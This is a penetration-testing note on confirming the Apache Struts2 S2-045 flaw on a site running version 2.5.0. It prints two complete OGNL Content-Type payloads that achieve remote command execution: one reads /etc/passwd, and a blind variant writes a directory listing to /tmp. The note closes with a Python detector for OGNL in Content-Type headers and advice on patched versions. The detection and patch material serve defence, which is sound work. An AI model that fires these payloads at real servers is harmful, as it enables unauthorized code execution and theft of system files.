The website runs Struts2 version 2.5.0.
The reference article used during testing was http://www.myhack58.com/Article/html/3/62/2017/84026.htm
The main step is to intercept an upload request with Burp Suite and then modify its Content-Type header.
The Content-Type value found online is basically written like this:
header["Content-Type"]='''%{(#nike='multipart/form-data'). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess=#dm): ((#container=#context['com.opensymphony.xwork2.ActionContext.container']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd'). (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)). (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush())}'''
However, because this site handles the request somewhat unusually, getOutputStream() ends up being called twice and throws an error, so nothing is returned and it is impossible to tell whether the vulnerability exists; the backend just logs an error.
So, after some analysis, I modified the Content-Type as follows:
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls / > /tmp/aaa1.txt').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@java.lang.System@out.println('123'))}
The result: the console printed 123, and the file aaa1.txt appeared under /tmp.
This confirms that the tested website is vulnerable to S2-045.
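From the defender's side, the tell-tale of S2-045 is an OGNL expression sitting where a multipart Content-Type should be. The following is an added detection example, not code from the original note: it parses a raw HTTP request, pulls the Content-Type header and flags values containing the OGNL tokens seen in the payloads above. The marker list, the sample requests and the host name are constructed for the example.

```python
import re

# Constructed heuristic: tokens that appear when an OGNL expression is smuggled
# into Content-Type (S2-045). A well-formed multipart Content-Type looks like
# "multipart/form-data; boundary=..." and contains none of them.
OGNL_MARKERS = (
    r"%\{",                       # OGNL expression opener
    r"#_memberAccess",
    r"ognl\.OgnlContext",
    r"DEFAULT_MEMBER_ACCESS",
    r"java\.lang\.ProcessBuilder",
)

def parse_headers(raw_request: str) -> dict:
    """Return the headers of a raw HTTP request as a lower-cased name -> value dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def ognl_markers_in(value: str) -> list:
    """List the OGNL markers found in a header value (case-insensitive)."""
    return [m for m in OGNL_MARKERS if re.search(m, value, re.IGNORECASE)]

def is_s2_045_attempt(raw_request: str) -> bool:
    """Flag a request whose Content-Type header carries an OGNL expression."""
    content_type = parse_headers(raw_request).get("content-type", "")
    return bool(ognl_markers_in(content_type))

# Constructed sample requests: a normal upload and one with the S2-045 shape
# (only the member-access prologue from the page, no command stage).
BENIGN = (
    "POST /upload.action HTTP/1.1\r\nHost: example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----FormBoundary7MA4YWxk\r\n\r\n"
    "------FormBoundary7MA4YWxk\r\n"
)
PROBE = (
    "POST /upload.action HTTP/1.1\r\nHost: example.test\r\n"
    "Content-Type: %{(#nike='multipart/form-data')"
    ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))}\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("probe", PROBE)):
        print(label, is_s2_045_attempt(req))
```

Struts 2.5.0 falls inside the affected range (2.3.5 to 2.3.31 and 2.5 to 2.5.10); upgrading to 2.3.32 / 2.5.10.1 or later removes the flaw, and this header check is only a stop-gap in front of an unpatched instance.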